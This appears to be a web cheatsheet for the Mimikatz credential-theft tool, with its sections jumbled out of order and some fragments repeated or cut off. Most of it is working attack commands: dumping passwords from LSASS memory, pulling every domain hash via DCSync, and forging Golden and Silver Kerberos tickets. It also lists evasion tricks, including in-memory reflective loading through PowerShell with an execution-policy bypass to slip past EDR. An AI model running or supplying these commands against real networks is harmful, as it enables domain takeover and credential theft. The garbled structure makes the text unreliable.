Cheatsheet | Mimikatz

mimikatz.exe "privilege::debug" "token::elevate" "exit" 1. Grab Passwords from LSASS Memory (sekurlsa) This is the classic "pass-the-hash" or "pass-the-password" attack.

| Command | Result | | :--- | :--- | | lsadump::dcsync /user:Administrator | Get hash of a specific user without touching LSASS. | | lsadump::dcsync /all | Dump domain user hash. This is catastrophic for the blue team. | 4. Kerberos Attacks (Golden & Silver Tickets) | Command | Use Case | | :--- | :--- | | kerberos::golden /user:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /id:500 /ptt | Create a Golden Ticket (krbtgt hash required). Grants unlimited domain access . | | kerberos::golden /user:USER /domain:DOMAIN /sid:SID /target:TARGET /rc4:HASH /service:cifs /ptt | Create a Silver Ticket (service account hash required). | | kerberos::purge | Clear existing Kerberos tickets before injection. | Phase 3: Advanced Evasion & Living off the Land Because modern EDR kills mimikatz.exe , use these techniques: Technique A: Non-Exported Output # Log output to a file instead of printing to screen mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\temp\log.txt Technique B: Reflective Loading (PowerShell) Load Mimikatz directly into memory without touching disk. mimikatz cheatsheet

However, with great power comes great responsibility. This cheatsheet is strictly for . ⚠️ Warning: Modern Antivirus (AV) and Endpoint Detection & Response (EDR) aggressively flag Mimikatz. You will rarely run the vanilla .exe on a live engagement today. Phase 1: Loading & Privilege Escalation Before running any commands, you must load Mimikatz and gain the necessary rights. | | lsadump::dcsync /all | Dump domain user hash

# Using Invoke-Mimikatz (from PowerSploit) powershell -exec bypass Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' Save commands to a .txt file and execute silently.